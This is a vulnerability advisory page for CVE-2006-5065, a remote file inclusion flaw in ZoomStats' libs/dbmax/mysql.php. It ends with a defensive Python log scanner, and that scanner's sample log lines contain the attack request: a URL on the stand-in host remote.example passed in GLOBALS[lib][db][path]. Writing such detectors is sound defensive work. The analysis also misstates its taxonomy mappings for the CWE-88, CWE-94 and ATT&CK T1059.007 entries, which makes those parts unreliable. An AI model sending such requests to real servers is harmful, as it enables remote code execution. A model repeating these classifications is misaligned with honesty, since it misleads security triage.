CVE-2006-5065 in ZoomStats
Summary
by MITRE
PHP remote file inclusion vulnerability in libs/dbmax/mysql.php in ZoomStats 1.0.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[lib][db][path] parameter.
Analysis
by VulDB Data Team • 04/23/2026
CVE-2006-5065 is a critical remote file inclusion flaw in the ZoomStats web application, version 1.0.2 and earlier. The flaw is in the mysql.php file in the application's libs/dbmax directory. It arises from input validation and sanitization that fail to handle user-supplied data properly, creating an avenue for malicious code execution. The vulnerability is particularly dangerous because it relies on the deprecated register_globals PHP configuration setting, which automatically creates global variables from request parameters, significantly amplifying the attack surface.
The technical exploitation of this vulnerability occurs through manipulation of the GLOBALS[lib][db][path] parameter within the application's request handling mechanism. When register_globals is enabled, the application inadvertently converts this parameter into a global variable, allowing attackers to inject malicious URLs that point to remote servers hosting malicious PHP code. This injection occurs during the database connection process where the application attempts to include a file specified by the path parameter. The vulnerability is classified under CWE-88, which describes improper neutralization of special elements used in an OS command, and more specifically aligns with CWE-94, which addresses the execution of code with elevated privileges. The attack vector follows the ATT&CK technique T1059.007 for PHP command execution and T1190 for exploitation of remote file inclusion vulnerabilities.
The operational impact of this vulnerability extends beyond simple code execution, as it enables attackers to gain full control over the affected web server. Once successfully exploited, adversaries can upload additional malicious payloads, establish persistent backdoors, and potentially escalate privileges to execute arbitrary commands on the underlying operating system. The vulnerability affects web applications running on PHP environments with register_globals enabled, which was common in older PHP configurations before the setting was deprecated in PHP 5.3.0 and removed in PHP 5.4.0. The risk is particularly high in shared hosting environments where multiple applications share the same server resources, as successful exploitation could lead to compromise of other applications hosted on the same server infrastructure.
Mitigation strategies for this vulnerability must address both immediate remediation and long-term architectural improvements. The primary recommendation involves disabling the register_globals setting in PHP configuration files, which eliminates the automatic creation of global variables from request parameters. Additionally, developers should implement proper input validation and sanitization mechanisms that prevent malicious data from being processed as file paths. The application should employ absolute path validation, use allowlists for acceptable file paths, and implement proper output encoding techniques. Security measures should also include regular code reviews focusing on file inclusion patterns and parameter handling, as well as implementing web application firewalls that can detect and block suspicious parameter injection attempts. Organizations should also consider implementing the principle of least privilege, ensuring that web applications run with minimal required permissions and that file inclusion operations are strictly controlled through secure coding practices. The vulnerability demonstrates the importance of adhering to secure coding guidelines and the dangers of relying on deprecated PHP configurations that create inherent security weaknesses in application design.
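As an added example (not code from ZoomStats, MITRE or VulDB), the sketch below shows detection logic a log review or WAF rule could apply for this CVE: it flags requests to libs/dbmax/mysql.php whose GLOBALS[lib][db][path] parameter begins with a URL scheme. The log lines, the `/stats/` install prefix and the `remote.example` host are constructed, and an Apache-style access log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter named in the CVE-2006-5065 description.
TARGET_SCRIPT = "libs/dbmax/mysql.php"
TARGET_PARAM = "GLOBALS[lib][db][path]"
# A value that starts with "scheme://" is a URL, not a local library path.
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)
# Request line inside an Apache-style access log entry (assumed format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_rfi_attempt(request_target):
    """True if the target hits the script with a URL in the path parameter."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(TARGET_SCRIPT):
        return False
    # parse_qsl percent-decodes names and values, so %5B...%5D and
    # %3A%2F%2F encodings are compared in decoded form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == TARGET_PARAM and URL_VALUE.search(value):
            return True
    return False

def scan(lines):
    """Return the log lines whose request matches the pattern.
    POST bodies are not logged, so body-borne parameters are not covered."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and is_rfi_attempt(m.group(1)):
            hits.append(line)
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /stats/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /stats/libs/dbmax/mysql.php'
    '?GLOBALS[lib][db][path]=http://remote.example/x.txt? HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /stats/libs/dbmax/mysql.php'
    '?GLOBALS%5Blib%5D%5Bdb%5D%5Bpath%5D=HTTP%3A%2F%2Fremote.example%2Fx HTTP/1.0" 200 0',
    '203.0.113.9 - - [01/Jan/2024:10:02:15 +0000] "GET /stats/libs/dbmax/mysql.php'
    '?GLOBALS[lib][db][path]=libs/dbmax/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT:", hit)
```

A hit returned with status 200 on a host that still runs with register_globals enabled warrants checking the server for outbound fetches at the same timestamp.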